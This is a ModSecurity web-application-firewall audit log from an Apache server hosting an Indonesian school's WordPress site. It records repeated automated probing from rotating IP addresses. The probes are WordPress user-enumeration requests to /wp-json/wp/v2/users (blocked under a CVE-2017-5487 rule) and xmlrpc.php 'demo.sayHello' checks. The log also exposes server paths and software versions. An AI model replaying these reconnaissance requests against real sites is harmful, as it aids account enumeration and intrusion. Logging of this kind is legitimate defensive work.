"apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1747432744759848 5844 (- - -) Stopwatch2: 1747432744759848 5844; combined=4221, p1=579, p2=3416, p3=29, p4=32, p5=97, sr=85, sw=68, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --51337719-Z-- --45e4bc2c-A-- [17/May/2025:04:59:20 +0700] aCe1OHyxdQCiyU1ENFciPgAAAAI 103.236.140.4 56282 103.236.140.4 8181 --45e4bc2c-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 154.213.162.109 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 154.213.162.109 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --45e4bc2c-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --45e4bc2c-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747432760600863 2803 (- - -) Stopwatch2: 1747432760600863 2803; combined=1237, p1=437, p2=769, p3=0, p4=0, p5=30, sr=75, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --45e4bc2c-Z-- --3c841c22-A-- [17/May/2025:04:59:29 +0700] aCe1Qem4kjNN-hEbWjI8ZAAAAFQ 103.236.140.4 56286 103.236.140.4 8181 --3c841c22-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 154.213.162.109 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 154.213.162.109 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --3c841c22-C-- demo.sayHello --3c841c22-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --3c841c22-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1747432769395336 6520 (- - -) Stopwatch2: 1747432769395336 6520; combined=4680, p1=588, p2=3858, p3=36, p4=38, p5=96, sr=80, sw=64, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --3c841c22-Z-- --bb925500-A-- [17/May/2025:05:00:21 +0700] aCe1dXyxdQCiyU1ENFciQAAAAAU 103.236.140.4 56296 103.236.140.4 8181 --bb925500-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.228.89.175 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.89.175 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --bb925500-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --bb925500-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747432821226549 3359 (- - -) Stopwatch2: 1747432821226549 3359; combined=1446, p1=486, p2=918, p3=0, p4=0, p5=42, sr=80, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --bb925500-Z-- --1b2d2534-A-- [17/May/2025:05:00:25 +0700] aCe1eXyxdQCiyU1ENFciQgAAAAc 103.236.140.4 56300 103.236.140.4 8181 --1b2d2534-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.228.89.175 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.89.175 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --1b2d2534-C-- demo.sayHello --1b2d2534-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --1b2d2534-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1747432825386844 6536 (- - -) Stopwatch2: 1747432825386844 6536; combined=4722, p1=632, p2=3876, p3=36, p4=41, p5=83, sr=83, sw=54, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --1b2d2534-Z-- --ab4a910d-A-- [17/May/2025:05:01:42 +0700] aCe1xum4kjNN-hEbWjI8ZgAAAFg 103.236.140.4 56308 103.236.140.4 8181 --ab4a910d-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.228.181.209 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.181.209 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --ab4a910d-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --ab4a910d-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747432902210958 3658 (- - -) Stopwatch2: 1747432902210958 3658; combined=1610, p1=556, p2=1022, p3=0, p4=0, p5=32, sr=122, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --ab4a910d-Z-- --73c09e49-A-- [17/May/2025:05:01:48 +0700] aCe1zBKi5m5upc8uMd6eOgAAANU 103.236.140.4 56314 103.236.140.4 8181 --73c09e49-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.228.181.209 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.181.209 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --73c09e49-C-- demo.sayHello --73c09e49-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --73c09e49-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1747432908008696 5932 (- - -) Stopwatch2: 1747432908008696 5932; combined=4250, p1=562, p2=3456, p3=31, p4=34, p5=98, sr=79, sw=69, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --73c09e49-Z-- --b41a1537-A-- [17/May/2025:05:01:48 +0700] aCe1zOm4kjNN-hEbWjI8aQAAAEQ 103.236.140.4 56316 103.236.140.4 8181 --b41a1537-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.228.112.97 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.112.97 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --b41a1537-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --b41a1537-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747432908400447 2720 (- - -) Stopwatch2: 1747432908400447 2720; combined=1191, p1=396, p2=767, p3=0, p4=0, p5=28, sr=80, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --b41a1537-Z-- --b0256730-A-- [17/May/2025:05:01:53 +0700] aCe10XyxdQCiyU1ENFciRAAAAAo 103.236.140.4 56322 103.236.140.4 8181 --b0256730-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.228.112.97 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.112.97 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --b0256730-C-- demo.sayHello --b0256730-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --b0256730-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1747432913454507 4664 (- - -) Stopwatch2: 1747432913454507 4664; combined=3595, p1=446, p2=2950, p3=24, p4=25, p5=88, sr=66, sw=62, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --b0256730-Z-- --ff94be27-A-- [17/May/2025:05:02:30 +0700] aCe19hKi5m5upc8uMd6eOwAAANY 103.236.140.4 56326 103.236.140.4 8181 --ff94be27-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.242.35.169 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.242.35.169 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --ff94be27-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --ff94be27-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747432950606602 3052 (- - -) Stopwatch2: 1747432950606602 3052; combined=1282, p1=430, p2=822, p3=0, p4=0, p5=30, sr=80, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --ff94be27-Z-- --b3beb873-A-- [17/May/2025:05:02:34 +0700] aCe1-nyxdQCiyU1ENFciRgAAAAw 103.236.140.4 56330 103.236.140.4 8181 --b3beb873-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.242.35.169 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.242.35.169 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --b3beb873-C-- demo.sayHello --b3beb873-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --b3beb873-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1747432954462401 4894 (- - -) Stopwatch2: 1747432954462401 4894; combined=3705, p1=449, p2=3054, p3=24, p4=25, p5=91, sr=69, sw=62, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --b3beb873-Z-- --d5215a4d-A-- [17/May/2025:05:03:57 +0700] aCe2TXyxdQCiyU1ENFciSAAAABA 103.236.140.4 56340 103.236.140.4 8181 --d5215a4d-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.228.85.217 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.85.217 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --d5215a4d-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --d5215a4d-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747433037005365 3289 (- - -) Stopwatch2: 1747433037005365 3289; combined=1301, p1=462, p2=810, p3=0, p4=0, p5=29, sr=84, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --d5215a4d-Z-- --8cda6c2c-A-- [17/May/2025:05:04:00 +0700] aCe2UBKi5m5upc8uMd6ePAAAANc 103.236.140.4 56342 103.236.140.4 8181 --8cda6c2c-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.248.84.6 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.248.84.6 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --8cda6c2c-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --8cda6c2c-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747433040475823 3291 (- - -) Stopwatch2: 1747433040475823 3291; combined=1380, p1=493, p2=852, p3=0, p4=0, p5=35, sr=106, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --8cda6c2c-Z-- --47380712-A-- [17/May/2025:05:04:04 +0700] aCe2VHyxdQCiyU1ENFciSgAAABI 103.236.140.4 56348 103.236.140.4 8181 --47380712-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.228.85.217 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.85.217 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --47380712-C-- demo.sayHello --47380712-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --47380712-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1747433044117853 4401 (- - -) Stopwatch2: 1747433044117853 4401; combined=3469, p1=435, p2=2839, p3=22, p4=24, p5=88, sr=68, sw=61, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --47380712-Z-- --4dc7126b-A-- [17/May/2025:05:04:04 +0700] aCe2VHyxdQCiyU1ENFciSwAAABM 103.236.140.4 56350 103.236.140.4 8181 --4dc7126b-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 154.213.204.25 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 154.213.204.25 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --4dc7126b-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --4dc7126b-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747433044584248 2152 (- - -) Stopwatch2: 1747433044584248 2152; combined=976, p1=318, p2=627, p3=0, p4=0, p5=31, sr=71, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --4dc7126b-Z-- --78ac1174-A-- [17/May/2025:05:04:06 +0700] aCe2VhKi5m5upc8uMd6ePgAAAMA 103.236.140.4 56352 103.236.140.4 8181 --78ac1174-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.248.84.6 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.248.84.6 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --78ac1174-C-- demo.sayHello --78ac1174-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --78ac1174-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1747433046598868 6050 (- - -) Stopwatch2: 1747433046598868 6050; combined=4488, p1=570, p2=3709, p3=31, p4=33, p5=86, sr=80, sw=59, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --78ac1174-Z-- --4eda2479-A-- [17/May/2025:05:04:09 +0700] aCe2WQTOsBn9MSWb6WJqDAAAAI4 103.236.140.4 56360 103.236.140.4 8181 --4eda2479-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 154.213.204.25 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 154.213.204.25 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --4eda2479-C-- demo.sayHello --4eda2479-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --4eda2479-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1747433049338737 4848 (- - -) Stopwatch2: 1747433049338737 4848; combined=3758, p1=497, p2=3025, p3=22, p4=23, p5=108, sr=107, sw=83, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
